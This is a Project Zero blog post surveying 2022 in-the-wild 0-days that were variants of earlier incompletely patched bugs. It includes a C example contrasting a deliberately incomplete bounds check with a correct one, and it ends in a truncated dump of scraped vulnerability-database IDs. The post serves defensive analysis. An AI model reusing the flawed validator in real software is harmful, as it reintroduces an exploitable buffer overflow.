Posted by Maddie Stone, Google Project Zero
This blog post is an overview of a talk, “0-day In-the-Wild Exploitation in 2022…so far”, that I gave at the FIRST conference in June 2022. The slides are available [here](<https://github.com/maddiestone/ConPresentations/blob/master/FIRST2022.2022_0days_so_far.pdf>).
For the last three years, we’ve published annual year-in-review reports of 0-days found exploited in the wild. The most recent of these reports is the [2021 Year in Review report](<https://googleprojectzero.blogspot.com/2022/04/the-more-you-know-more-you-know-you.html>), which we published just a few months ago in April. While we plan to stick with that annual cadence, we’re publishing a little bonus report today looking at the in-the-wild 0-days detected and disclosed in the first half of 2022.
As of June 15, 2022, there have been 18 0-days detected and disclosed as exploited in-the-wild in 2022. When we analyzed those 0-days, we found that at least nine of the 0-days are variants of previously patched vulnerabilities. At least half of the 0-days we’ve seen in the first six months of 2022 could have been prevented with more comprehensive patching and regression tests. On top of that, four of the 2022 0-days are variants of 2021 in-the-wild 0-days. Just 12 months from the original in-the-wild 0-day being patched, attackers came back with a variant of the original bug.
| Product | 2022 ITW 0-day | Variant |
|---|---|---|
| Windows win32k | [CVE-2022-21882](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2022/CVE-2022-21882.html>) | [CVE-2021-1732](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-1732.html>) (2021 itw) |
| iOS IOMobileFrameBuffer | [CVE-2022-22587](<https://support.apple.com/en-us/HT213053>) | [CVE-2021-30983](<https://googleprojectzero.blogspot.com/2022/06/curious-case-carrier-app.html>) (2021 itw) |
| Windows | [CVE-2022-30190](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30190>) (“Follina”) | [CVE-2021-40444](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444>) (2021 itw) |
| Chromium property access interceptors | [CVE-2022-1096](<https://chromereleases.googleblog.com/2022/03/stable-channel-update-for-desktop_25.html>) | [CVE-2016-5128](<https://bugs.chromium.org/p/chromium/issues/detail?id=619166>), [CVE-2021-30551](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-30551.html>) (2021 itw), [CVE-2022-1232](<https://bugs.chromium.org/p/project-zero/issues/detail?id=2280>) (addresses incomplete CVE-2022-1096 fix) |
| Chromium v8 | [CVE-2022-1364](<https://chromereleases.googleblog.com/2022/04/stable-channel-update-for-desktop_14.html>) | [CVE-2021-21195](<https://chromereleases.googleblog.com/2021/03/stable-channel-update-for-desktop_30.html>) |
| WebKit | [CVE-2022-22620](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2022/CVE-2022-22620.html>) (“Zombie”) | [Bug was originally fixed in 2013, patch was regressed in 2016](<https://googleprojectzero.blogspot.com/2022/06/an-autopsy-on-zombie-in-wild-0-day.html>) |
| Google Pixel | [CVE-2021-39793](<https://source.android.com/security/bulletin/pixel/2022-03-01>)\* | [Linux same bug in a different subsystem](<https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=cd5297b0855f17c8b4e3ef1d20c6a3656209c7b3>) |
| Atlassian Confluence | [CVE-2022-26134](<https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html>) | [CVE-2021-26084](<https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html>) |
| Windows | [CVE-2022-26925](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26925>) (“PetitPotam”) | [CVE-2021-36942](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36942>) (patch regressed) |

\* While this CVE says 2021, the bug was patched and disclosed in 2022.
So, what does this mean?
When people think of 0-day exploits, they often think that these exploits are so technologically advanced that there’s no hope to catch and prevent them. The data paints a different picture. At least half of the 0-days we’ve seen so far this year are closely related to bugs we’ve seen before. Our conclusion and findings in the [2020 year-in-review report](<https://googleprojectzero.blogspot.com/2021/02/deja-vu-lnerability.html>) were very similar.
Many of the 2022 in-the-wild 0-days are due to the previous vulnerability not being fully patched. In the case of the Windows win32k and the Chromium property access interceptor bugs, the execution flow that the proof-of-concept exploits took was patched, but the root cause was not addressed: attackers were able to come back and trigger the original vulnerability through a different path. In the case of the WebKit and Windows PetitPotam issues, the original vulnerability had previously been patched, but at some point the fix regressed so that attackers could exploit the same vulnerability again. In the iOS IOMobileFrameBuffer bug, a buffer overflow was addressed by checking that a size was less than a certain number, but the fix didn’t check a minimum bound on that size. For more detailed explanations of three of the 0-days and how they relate to their variants, please see the [slides from the talk](<https://github.com/maddiestone/ConPresentations/blob/master/FIRST2022.2022_0days_so_far.pdf>).
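As an added illustration (constructed for this post, not Apple's IOMobileFrameBuffer code), the following C snippet shows the shape of an upper-bound-only size check next to its complete form, and the boundary values a regression test for such a fix should cover; the buffer capacity, validator names and boundary list are assumptions.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Constructed example: a signed size from an untrusted caller is later
 * used as the length of a copy into a fixed-capacity buffer. */
#define BUF_CAPACITY 64

typedef bool (*size_check_fn)(int32_t size);

/* Incomplete fix: only the upper bound is checked. A negative size
 * satisfies "size < BUF_CAPACITY" and then becomes a huge value when
 * implicitly converted to size_t for the copy. */
static bool size_ok_incomplete(int32_t size) {
    return size < BUF_CAPACITY;
}

/* Complete fix: both the lower and the upper bound are checked. */
static bool size_ok_complete(int32_t size) {
    return size >= 0 && size < BUF_CAPACITY;
}

enum outcome { REJECTED, ACCEPTED_SAFE, ACCEPTED_OVERFLOW };

/* Runs one size through a validator and reports whether the copy length
 * the validator admitted would still fit in the buffer. The conversion
 * to size_t mirrors what memcpy's length parameter does implicitly. */
static enum outcome evaluate(size_check_fn check, int32_t size) {
    if (!check(size))
        return REJECTED;
    size_t len = (size_t)size;
    return len <= BUF_CAPACITY ? ACCEPTED_SAFE : ACCEPTED_OVERFLOW;
}

/* Boundary values a regression test for this kind of fix should cover:
 * both ends of the signed range, zero, and both sides of the capacity. */
static const int32_t boundary_cases[] = {
    INT32_MIN, -1, 0, 1, BUF_CAPACITY - 1, BUF_CAPACITY, INT32_MAX
};

/* Counts how many boundary values a validator accepts even though the
 * resulting copy would exceed the buffer. A correct fix returns 0. */
static int count_accepted_overflows(size_check_fn check) {
    int overflows = 0;
    size_t n = sizeof boundary_cases / sizeof boundary_cases[0];
    for (size_t i = 0; i < n; i++) {
        if (evaluate(check, boundary_cases[i]) == ACCEPTED_OVERFLOW)
            overflows++;
    }
    return overflows;
}

int main(void) {
    printf("incomplete fix admits %d overflowing boundary cases\n",
           count_accepted_overflows(size_ok_incomplete));
    printf("complete fix admits %d overflowing boundary cases\n",
           count_accepted_overflows(size_ok_complete));
    return 0;
}
```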
When 0-day exploits are detected in-the-wild, it’s the failure case for an attacker. It’s a gift for us security defenders to learn as much as we can and take actions to ensure that that vector can’t be used again. The goal is to force attackers to start from scratch each time we detect one of their exploits: they’re forced to discover a whole new vulnerability, they have to invest the time in learning and analyzing a new attack surface, they must develop a brand new exploitation method. To do that effectively, we need correct and comprehensive fixes.
This is not to minimize the challenges faced by security teams responsible for responding to vulnerability reports. As we said in our 2020 year in review report:
Being able to correctly and comprehensively patch isn't just flicking a switch: it requires investment, prioritization, and planning. It also requires developing a patching process that balances both protecting users quickly and ensuring it is comprehensive, which can at times be in tension. While we expect that none of this will come as a surprise to security teams in an organization, this analysis is a good reminder that there is still more work to be done.
Exactly what investments are likely required depends on each unique situation, but we see some common themes around staffing/resourcing, incentive structures, process maturity, automation/testing, release cadence, and partnerships.
Practically, some of the following efforts can help ensure bugs are correctly and comprehensively fixed. Project Zero plans to continue to help with the following efforts, but we hope and encourage platform security teams and other independent security researchers to invest in these types of analyses as well:
* Root cause analysis: Understanding the underlying vulnerability that is being exploited, and trying to understand how that vulnerability may have been introduced. Performing a root cause analysis can help ensure that a fix addresses the underlying vulnerability and not just the proof-of-concept. Root cause analysis is generally a prerequisite for successful variant and patch analysis.
* Variant analysis: Looking for other vulnerabilities similar to the reported vulnerability. This can involve looking for the same bug pattern elsewhere, more thoroughly auditing the component that contained the vulnerability, modifying fuzzers to understand why they didn’t find the vulnerability previously, etc. Most researchers find more than one vulnerability at the same time. By finding and fixing the related variants, attackers are not able to simply “plug and play” with a new vulnerability once the original is patched.
* Patch analysis: Analyzing the proposed (or released) patch for completeness compared to the root cause vulnerability. I encourage vendors to share how they plan to address the vulnerability with the vulnerability reporter early, so the reporter can analyze whether the patch comprehensively addresses the root cause of the vulnerability, alongside the vendor’s own internal analysis.
* Exploit technique analysis: Understanding the primitive gained from the vulnerability and how it’s being used. While it’s generally industry-standard to patch vulnerabilities, mitigating exploit techniques doesn’t happen as frequently. Not every exploit technique can be mitigated, but the hope is that doing so becomes the default rather than the exception. Exploit samples will need to be shared more readily for vendors and security researchers to be able to perform exploit technique analysis.
Transparently sharing these analyses helps the industry as a whole as well. We publish our analyses at [this repository](<https://googleprojectzero.github.io/0days-in-the-wild/rca.html>). We encourage vendors and others to publish theirs as well. This allows developers and security professionals to better understand what the attackers already know about these bugs, which hopefully leads to even better solutions and security overall.
"B6182C52-78F5-58BC-8D3F-EF87D0239F0E", "B7D137AD-216F-5D27-9D7B-6F3B5EEB266D", "B8347185-A0AD-5C98-B2DB-599D8BE5EF53", "B992B3E1-DF6B-5594-8A16-ED385E07A24C", "B9C2639D-9C07-5F11-B663-C144F457A9F7", "BAA0F684-952E-5B9E-B207-0419A33AC53B", "BAEE7CC9-E997-5B82-A169-AB56B635CC1D", "BC3F41CB-4333-5CCE-85A9-7064DAA6019A", "BF930E9B-ED2F-52A3-87ED-2082926ED9B1", "BFA4DC64-759A-5113-842C-923C98D12B44", "C0A9F032-9822-59DC-94CC-20C15DEE0FED", "C58D4A9D-FE17-5F41-8B1B-800E327BB411", "C6912636-2CB2-54CA-9F78-1A4FF04CA119", "C8C50EDF-39F5-5103-AC79-A8C7FA6A4B60", "C9B0311C-F06D-5438-B36E-36DCE5FE691D", "CA13A26D-7A19-511A-B059-BE9AEDA1F2E2", "CC614155-FD7D-599B-B89C-006B26D76F48", "CC6DFDC6-184F-5748-A9EC-946E8BA5FB04", "CCA69DF0-1EB2-5F30-BEC9-04ED43F42EA5", "CD8CABD7-BE65-5434-B682-F73ABA737C65", "CE477D7E-7586-5C82-8DCC-033C48461E66", "CEC4033D-26C5-5A07-8D86-31A7AF928BDB", "CFDC15EB-BE4F-5C86-B8B0-C542A791F67D", "D22CFFB0-30A6-5227-8048-C9C028070BD3", "D424D6C6-13F7-5CAE-8771-9103296520B9", "D70A4D0B-027B-57A1-B882-C70D16FCA9C3", "DBAD59E8-9E48-5D54-92A0-AAD5B57C39F6", "DC2A0BD8-2ABF-5885-957D-0FA3B058665C", "DD36D028-7FB1-5824-9756-09BA3927DCEE", "DD5D2BF7-BE9D-59EA-8DF2-D85AEC13A4A0", "DEAA3BF4-9E7D-55E9-9534-6203A312C46F", "E06577DB-A581-55E1-968E-81430C294A84", "E34732DA-6DCA-54FF-8A7A-C1CCE3D1B1DE", "E51E8D61-BAA6-5098-9EEE-50DD18427F87", "E6B6EDFD-3B78-58CA-B507-093047F89BB1", "E7177DCC-97D5-5A91-8A06-124DD3CB9739", "E917FE93-F06C-5F70-915F-A5F48A30B044", "EA88FA45-8CE7-5D7D-8E6C-B04F8392F7EB", "EF37F62F-1579-535A-9C3E-49B080F41CAC", "F0CF90CD-DC6E-5F0F-AD61-5E1694700F32", "F42BF447-C1A3-5795-8343-D71F096AFF52", "F437A0D1-7913-51F2-9D43-8BC2DE62A636", "F5B504D7-7C37-5BAB-94A5-1F1DA8384055", "F5CEF191-B04C-5FC5-82D1-3B728EC648A9", "F8CD1EFD-78D9-5506-9555-5A12EFB752AB", "F8ECE1BA-CC33-5566-B57C-1AB243A48E28", "F96D1468-D4E5-54F8-A03B-503ABF9BC416", "F9C11A07-BBCF-5A15-82EF-084BD278A556", "FAF36735-05C9-50E1-B458-BA2E15B5EB99", "FB757D3A-A896-5AB5-B72B-7C880581D12E", 
"FBB2DA29-1A11-5D78-A28C-1BF3821613AC", "FBC7C8E7-D9E9-50AF-A463-1504B4FC5BE9", "FC455648-370A-582B-A03A-6299DDC272F6", "FCCAAA4B-646B-578D-8CE2-5439E7799C32", "FD4859A0-D69F-503C-BFDB-0C9025BDC68F", "FD6B81DE-3BFF-5BC7-BD1F-E90103B8FBEF", "FF761088-559C-5E71-A5CD-196D4E4571B8", "FFA2D3A3-AFD4-580B-8424-EE4844976B65"]}, {"type": "googleprojectzero", "idList": ["GOOGLEPROJECTZERO:134E75915DAD18CF160898445DC5FC4A", "GOOGLEPROJECTZERO:3A510C521DE8145372456D2B0FE8C8E5", "GOOGLEPROJECTZERO:591D9795B7E42F2AC5B0A7CA7AA82BEB", "GOOGLEPROJECTZERO:A395083F123D276DEBD13E65116FEA09", "GOOGLEPROJECTZERO:CA925EE6A931620550EF819815B14156"]}, {"type": "hackerone", "idList": ["H1:1606957"]}, {"type": "hivepro", "idList": ["HIVEPRO:04FABAE2F2B647B3488AA0025301D637", "HIVEPRO:1BBAC0CD5F3681EC49D06BE85DC90A92", "HIVEPRO:2A4C96F3CDC5144909A1C1EA5E182515", "HIVEPRO:573E7326CF205779BA6C4D3AB8DDB736", "HIVEPRO:6551149EE518F9D073E43B5017FE0F24", "HIVEPRO:846D6C3457AE99FD0B4F29A6398D6F81", "HIVEPRO:9E33ABD5EAFB3204848DAD28367798A9", "HIVEPRO:9ED793E90599B498499D6CB773C9F42F", "HIVEPRO:B3F9F66CBDECF3B8E7AADF5951D97F6A", "HIVEPRO:B772F2F7B4C9AE8452D1197E2E240204", "HIVEPRO:B84508E062BD1F35232DF0CC7CDDC761", "HIVEPRO:C0B03D521C5882F1BE07ECF1550A5F74", "HIVEPRO:C7B595FEDAF36C429CA05AF1C5C3D818", "HIVEPRO:CA37C8D639BE8660B8996BB5FB4F3C0F", "HIVEPRO:E57DA2FED4B890B898EFA2B68C657043", "HIVEPRO:E7F36EC1E4DCF018F94ECD22747B7093", "HIVEPRO:E9C63D0D70D3232F21940B33FC205340", "HIVEPRO:F95B9B5A24C6987E85478A62BD37DD7D"]}, {"type": "ics", "idList": ["AA22-117A", "AA22-216A", "AA22-279A", "AA23-215A", "ICSA-22-209-01"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:0BD55CF3ADC4FC18663ADAF4AE9272D2", "IMPERVABLOG:7CB37AC69862942C5D316E69A7815579", "IMPERVABLOG:85E1B351EDAA80DF81632A8B8BD07634", "IMPERVABLOG:F193BFA34E9266EE9047B9FAB1A3A1B5"]}, {"type": "kaspersky", "idList": ["KLA10846", "KLA12071", "KLA12133", "KLA12134", "KLA12182", "KLA12204", "KLA12205", "KLA12209", "KLA12250", "KLA12259", 
"KLA12277", "KLA12278", "KLA12422", "KLA12492", "KLA12499", "KLA12513", "KLA12524", "KLA12526", "KLA12529", "KLA12549", "KLA12550"]}, {"type": "kitploit", "idList": ["KITPLOIT:3043339745958474082", "KITPLOIT:3697667464193804316"]}, {"type": "krebs", "idList": ["KREBS:1BEFD58F5124A2E4CA40BD9C1B49B9B7", "KREBS:2752861A306F74170D69FBD9E0DC3AAB", "KREBS:2EC42B845847A6DCFE50ECEB9FF61C29", "KREBS:409088FC2DFC219B74043104C2B672CC", "KREBS:5FA70C019AB463F5E02A97C6891685D8", "KREBS:7BA87FE317071FD5ACDB0EBEBA296F41"]}, {"type": "mageia", "idList": ["MGASA-2016-0274", "MGASA-2022-0075", "MGASA-2022-0118", "MGASA-2022-0146"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:0647495F01C9F1847B118A9E32BC6C13", "MALWAREBYTES:08FDD3DEF41B63F1DEB23C21DCFDB12D", "MALWAREBYTES:0CEEA2EDED4A06AE416CB7875CCE1C94", "MALWAREBYTES:180975C3E3516E431BF7664666327048", "MALWAREBYTES:3203C761121FB47FC676CC2505B4A9FD", "MALWAREBYTES:390E663F11CA04293C83488A40CB3A8A", "MALWAREBYTES:3C358DDA439A247A9677866AFE8FA961", "MALWAREBYTES:4E1B9086679032E60157678F3E82229D", "MALWAREBYTES:69B09CC9DBBA58546698D97B0C4BAAF0", "MALWAREBYTES:6A30A2B661E06D2D7D26479F27BB0EF3", "MALWAREBYTES:6AC81D4001C847401760BE111E21585B", "MALWAREBYTES:762422C08BCD930748F1EED62A25716D", "MALWAREBYTES:76333D1F0FCAFD79FA2EDD4A4CAFBB38", "MALWAREBYTES:7697B62E0C0C7AA37884F3F73C3AF324", "MALWAREBYTES:801E20618F96EF51F9E60F7BC7906C2B", "MALWAREBYTES:8922C922FFDE8B91C7154D8C990B62EF", "MALWAREBYTES:96F58422910DF7040786EDB21736E547", "MALWAREBYTES:9E683A8CBB0F4ADB76A7183C47833E13", "MALWAREBYTES:A92CA3CF06DBCD086A388A462B770E3B", "MALWAREBYTES:B8C767042833344389F6158273089954", "MALWAREBYTES:C265FF6D1D82CDE3FB6E6C1E4248A791", "MALWAREBYTES:CA300551E02DA3FFA4255FBA0359A555", "MALWAREBYTES:D081BF7F95E3F31C6DB8CEF9AD86BD0D", "MALWAREBYTES:DB54B348AF1AC41987150B5CE7B1BC66", "MALWAREBYTES:E9F8D9962C90DF0556F1F4180FFAA7D7", "MALWAREBYTES:F1563A57212EB7AEC347075E94FF1605", "MALWAREBYTES:FC8647475CCD473D01B5C0257286E101"]}, {"type": 
"metasploit", "idList": ["MSF:EXPLOIT-MULTI-HTTP-ATLASSIAN_CONFLUENCE_NAMESPACE_OGNL_INJECTION-", "MSF:EXPLOIT-MULTI-HTTP-ATLASSIAN_CONFLUENCE_WEBWORK_OGNL_INJECTION-", "MSF:EXPLOIT-WINDOWS-FILEFORMAT-WORD_MSDTJS_RCE-", "MSF:EXPLOIT-WINDOWS-FILEFORMAT-WORD_MSHTML_RCE-", "MSF:EXPLOIT-WINDOWS-LOCAL-CVE_2022_21882_WIN32K-"]}, {"type": "mmpc", "idList": ["MMPC:1AFF4881941FA1030862F773DC84A4A8", "MMPC:27EEFD67E5E7E712750B1472E15C5A0B", "MMPC:42ECD98DCF925DC4063DE66F75FB5433", "MMPC:795E0A765679492C51FEFA2B19EAD597"]}, {"type": "mscve", "idList": ["MS:CVE-2021-1698", "MS:CVE-2021-1732", "MS:CVE-2021-21195", "MS:CVE-2021-30551", "MS:CVE-2021-36942", "MS:CVE-2021-40444", "MS:CVE-2022-1096", "MS:CVE-2022-1232", "MS:CVE-2022-1364", "MS:CVE-2022-21882", "MS:CVE-2022-21887", "MS:CVE-2022-26925", "MS:CVE-2022-30190", "MS:CVE-2022-34713"]}, {"type": "mskb", "idList": ["KB5005030", "KB5005031", "KB5005033", "KB5005040", "KB5005043", "KB5005076", "KB5005088", "KB5005089", "KB5005090", "KB5005094", "KB5005095", "KB5005099", "KB5005106", "KB5005563"]}, {"type": "msrc", "idList": ["MSRC:023FEF60BCC2EE0035211FC95DB999BC", "MSRC:0FAFC00A7C2E92F14C0652D2CD1D14D7", "MSRC:4C56F4539ADD1B17DFD44549ADFEE2FF", "MSRC:AA9DD4993698C2F7A48FCF9F2BB413F3"]}, {"type": "mssecure", "idList": ["MSSECURE:1AFF4881941FA1030862F773DC84A4A8", "MSSECURE:27EEFD67E5E7E712750B1472E15C5A0B", "MSSECURE:42ECD98DCF925DC4063DE66F75FB5433", "MSSECURE:795E0A765679492C51FEFA2B19EAD597"]}, {"type": "nessus", "idList": ["802027.PRM", "ALMA_LINUX_ALSA-2022-1777.NASL", "APPLE_IOS_153_CHECK.NBIN", "ATLASSIAN_CONFLUENCE_CONFSERVER-79016.NASL", "CENTOS8_RHSA-2022-1777.NASL", "CONFLUENCE_CONFSERVER-67940.NASL", "CONFLUENCE_CVE-2022-26134_REMOTE.NASL", "CONFLUENCE_CVE_2021_26084.NBIN", "CONFLUENCE_CVE_2022_26134.NBIN", "DEBIAN_DSA-3637.NASL", "DEBIAN_DSA-4886.NASL", "DEBIAN_DSA-5083.NASL", "DEBIAN_DSA-5084.NASL", "DEBIAN_DSA-5110.NASL", "DEBIAN_DSA-5114.NASL", "DEBIAN_DSA-5121.NASL", 
"FREEBSD_PKG_20B3AB21C9DF11EB85583065EC8FD3EC.NASL", "FREEBSD_PKG_323F900DAC6D11ECA0B83065EC8FD3EC.NASL", "FREEBSD_PKG_6FAE9FE1504811E68AA73065EC8FD3EC.NASL", "FREEBSD_PKG_A25EA27BBCED11EC87B53065EC8FD3EC.NASL", "FREEBSD_PKG_BDDADAA4922711EB99C5E09467587C17.NASL", "FREEBSD_PKG_FE15F30AB4C911EC94A33065EC8FD3EC.NASL", "GENTOO_GLSA-201610-09.NASL", "GENTOO_GLSA-202104-08.NASL", "GENTOO_GLSA-202107-06.NASL", "GENTOO_GLSA-202208-25.NASL", "GENTOO_GLSA-202208-39.NASL", "GOOGLE_CHROME_100_0_4896_127.NASL", "GOOGLE_CHROME_100_0_4896_75.NASL", "GOOGLE_CHROME_52_0_2743_82.NASL", "GOOGLE_CHROME_89_0_4389_114.NASL", "GOOGLE_CHROME_91_0_4472_101.NASL", "GOOGLE_CHROME_99_0_4844_84.NASL", "MACOSX_GOOGLE_CHROME_100_0_4896_127.NASL", "MACOSX_GOOGLE_CHROME_100_0_4896_75.NASL", "MACOSX_GOOGLE_CHROME_52_0_2743_82.NASL", "MACOSX_GOOGLE_CHROME_89_0_4389_114.NASL", "MACOSX_GOOGLE_CHROME_91_0_4472_101.NASL", "MACOSX_GOOGLE_CHROME_99_0_4844_84.NASL", "MACOS_HT213054.NASL", "MACOS_HT213055.NASL", "MACOS_HT213092.NASL", "MICROSOFT_EDGE_CHROMIUM_100_0_1185_36.NASL", "MICROSOFT_EDGE_CHROMIUM_100_0_1185_44.NASL", "MICROSOFT_EDGE_CHROMIUM_89_0_774_68.NASL", "MICROSOFT_EDGE_CHROMIUM_91_0_864_48.NASL", "MICROSOFT_EDGE_CHROMIUM_99_0_1150_55.NASL", "MSDT_RCE_CVE_2022-30190_REG_CHECK.NASL", "OPENSUSE-2016-900.NASL", "OPENSUSE-2016-901.NASL", "OPENSUSE-2016-919.NASL", "OPENSUSE-2021-513.NASL", "OPENSUSE-2021-592.NASL", "OPENSUSE-2021-881.NASL", "OPENSUSE-2021-938.NASL", "OPENSUSE-2021-949.NASL", "OPENSUSE-2022-0114-1.NASL", "OPENSUSE-2022-0705-1.NASL", "ORACLELINUX_ELSA-2022-1777.NASL", "REDHAT-RHSA-2016-1485.NASL", "REDHAT-RHSA-2022-1777.NASL", "SMB_NT_MS21_AUG_5005030.NASL", "SMB_NT_MS21_AUG_5005043.NASL", "SMB_NT_MS21_AUG_5005089.NASL", "SMB_NT_MS21_AUG_5005094.NASL", "SMB_NT_MS21_AUG_5005095.NASL", "SMB_NT_MS21_AUG_5005106.NASL", "SMB_NT_MS21_FEB_4601315.NASL", "SMB_NT_MS21_FEB_4601319.NASL", "SMB_NT_MS21_FEB_4601345.NASL", "SMB_NT_MS21_FEB_4601354.NASL", "SMB_NT_MS21_IE_SEPT_2021.NASL", 
"SMB_NT_MS21_SEP_5005565.NASL", "SMB_NT_MS21_SEP_5005566.NASL", "SMB_NT_MS21_SEP_5005568.NASL", "SMB_NT_MS21_SEP_5005569.NASL", "SMB_NT_MS21_SEP_5005573.NASL", "SMB_NT_MS21_SEP_5005613.NASL", "SMB_NT_MS21_SEP_INTERNET_EXPLORER.NASL", "SMB_NT_MS22_JAN_5009543.NASL", "SMB_NT_MS22_JAN_5009545.NASL", "SMB_NT_MS22_JAN_5009555.NASL", "SMB_NT_MS22_JAN_5009557.NASL", "SMB_NT_MS22_JAN_5009566.NASL", "SMB_NT_MS22_JUN_5014678.NASL", "SMB_NT_MS22_JUN_5014692.NASL", "SMB_NT_MS22_JUN_5014697.NASL", "SMB_NT_MS22_JUN_5014699.NASL", "SMB_NT_MS22_JUN_5014702.NASL", "SMB_NT_MS22_JUN_5014710.NASL", "SMB_NT_MS22_JUN_5014741.NASL", "SMB_NT_MS22_JUN_5014742.NASL", "SMB_NT_MS22_JUN_5014743.NASL", "SMB_NT_MS22_JUN_5014746.NASL", "SMB_NT_MS22_MAY_5013941.NASL", "SMB_NT_MS22_MAY_5013942.NASL", "SMB_NT_MS22_MAY_5013943.NASL", "SMB_NT_MS22_MAY_5013944.NASL", "SMB_NT_MS22_MAY_5013945.NASL", "SMB_NT_MS22_MAY_5013952.NASL", "SMB_NT_MS22_MAY_5013963.NASL", "SMB_NT_MS22_MAY_5013999.NASL", "SMB_NT_MS22_MAY_5014001.NASL", "SMB_NT_MS22_MAY_5014006.NASL", "SMB_NT_MS22_MAY_5014018.NASL", "SUSE_SU-2022-0703-1.NASL", "SUSE_SU-2022-0705-1.NASL", "SUSE_SU-2022-0811-1.NASL", "UBUNTU_USN-3041-1.NASL", "UBUNTU_USN-5350-1.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310703637", "OPENVAS:1361412562310808263", "OPENVAS:1361412562310808264", "OPENVAS:1361412562310808265", "OPENVAS:1361412562310842848", "OPENVAS:1361412562310851369", "OPENVAS:1361412562310851370", "OPENVAS:1361412562310851374", "OPENVAS:703637"]}, {"type": "oraclelinux", "idList": ["ELSA-2022-1777"]}, {"type": "osv", "idList": ["OSV:DSA-3637-1", "OSV:DSA-4886-1", "OSV:DSA-5083-1", "OSV:DSA-5084-1", "OSV:DSA-5110-1", "OSV:DSA-5114-1", "OSV:DSA-5121-1"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:161880", "PACKETSTORM:164013", "PACKETSTORM:164122", "PACKETSTORM:165214", "PACKETSTORM:166169", "PACKETSTORM:167317", "PACKETSTORM:167430", "PACKETSTORM:167438", "PACKETSTORM:167449", "PACKETSTORM:167516"]}, {"type": "pentestpartners", 
"idList": ["PENTESTPARTNERS:E6B48FF79C5D0D1E4DD360F6010F2A93"]}, {"type": "photon", "idList": ["PHSA-2023-3.0-0602"]}, {"type": "qt", "idList": ["QT:B64AD93E56170FC29816162A7B78DDBC"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "QUALYSBLOG:027905A1E6C979D272DF11DDA2FC9F8F", "QUALYSBLOG:058E013CF475F33D6DEBB8955340D15B", "QUALYSBLOG:0F0ACCA731E84F3B1067935E483FC950", "QUALYSBLOG:5576D16DC39617927D8AEFF027CC0911", "QUALYSBLOG:573ABD5196CDA14A2E72A15A7330770D", "QUALYSBLOG:5CC7ADA9A785C30C51281080605F4A4F", "QUALYSBLOG:65C282BB0F312A3AD8A043024FD3D866", "QUALYSBLOG:7BB591052411447A2B315456D50D258C", "QUALYSBLOG:9E3CACCA2916D132C2D630A8C15119F3", "QUALYSBLOG:A0F20902D80081B44813D92C6DCCDAAF", "QUALYSBLOG:A63B251EBA1A69DBCD57674990704F6C", "QUALYSBLOG:AC756D2C7DB65BB8BC9FBD558B7F3AD3", "QUALYSBLOG:AD927BF1D1CDE26A3D54D9452C330BB3", "QUALYSBLOG:BB3D6B2DDD8D4FA41B52503EF011FDA4", "QUALYSBLOG:BC22CE22A3E70823D5F0E944CBD5CE4A", "QUALYSBLOG:CAF5B766E6B0E6C1A5ADF56D442E7BB2", "QUALYSBLOG:D38E3F9D341C222CBFEA0B99AD50C439", "QUALYSBLOG:EB91FABB1A5D9C2526980E996ED61260", "QUALYSBLOG:EBDC158D70A96D1C65D2AEE5C285A069", "QUALYSBLOG:F9C2629D40A6DC7640DB3D6BD4FB60B3"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:03B1EB65D8A7CFE486943E2472225BA1", "RAPID7BLOG:20364300767E58631FFE0D21622E63A3", "RAPID7BLOG:266ADCD22F7AAC05069D569EBF2FEBB9", "RAPID7BLOG:3538F350FD08E0CFD124821C57A21C64", "RAPID7BLOG:36C78C12B88BFE8FEF93D8EF7A7AA553", "RAPID7BLOG:396ACAA896DDC62391C1F6CBEDA04085", "RAPID7BLOG:44EA89871AFF6881B909B9FD0E07034F", "RAPID7BLOG:452CCDC1AEFFF7056148871E86A6FE26", "RAPID7BLOG:4BFD931715758C7B7E2711A580BFEA5E", "RAPID7BLOG:509F3BE1FB927288AB4D3BD9A3090852", "RAPID7BLOG:5CDF95FB2AC31414FD390E0E0A47E057", "RAPID7BLOG:619370773CDB77FA0DBA52EC74E4B159", "RAPID7BLOG:693317EA8EAC89A3ABCC113D072B326C", "RAPID7BLOG:6F833E0DB9E152EB8397D33430FECB7F", "RAPID7BLOG:755102CA788DC2D430C6890A3E9B1040", "RAPID7BLOG:82692E307F294B32BDCAC4053EBE23B2", 
"RAPID7BLOG:882168BD332366CE296FB09DC00E018E", "RAPID7BLOG:8882BFA669B38BCF7B5A8A26F657F735", "RAPID7BLOG:9171BB636F16B6AC97B939C701ABE971", "RAPID7BLOG:A7E1C05842DF5C07D9B1BA23B2235727", "RAPID7BLOG:A94573CD34833AE3602C45D8FAA89AD4", "RAPID7BLOG:ADAE3CACA7F41A02C12F44F4616369FF", "RAPID7BLOG:AE824D3989C792700A622C455D8EE160", "RAPID7BLOG:AF9402873FB7ED43C52806FDEB7BC6DD", "RAPID7BLOG:B294A0F514563C5FBF86F841910C60BE", "RAPID7BLOG:C45DEEA0736048FF17FF9A53E337C92D", "RAPID7BLOG:CC071AA6971D64B0F7A596B2BBD5F046", "RAPID7BLOG:D214650E6EFB584624DA76ACB1573C1B", "RAPID7BLOG:D435EE51E7D9443C43ADC937A046683C", "RAPID7BLOG:D9E3C0B84D67BD0A26DEAD5F6F4EAAC4", "RAPID7BLOG:DE426F8A59CA497BB6C0B90C0F1849CD"]}, {"type": "redhat", "idList": ["RHSA-2016:1485", "RHSA-2022:1777"]}, {"type": "redhatcve", "idList": ["RH:CVE-2016-5128", "RH:CVE-2022-1364", "RH:CVE-2022-22620"]}, {"type": 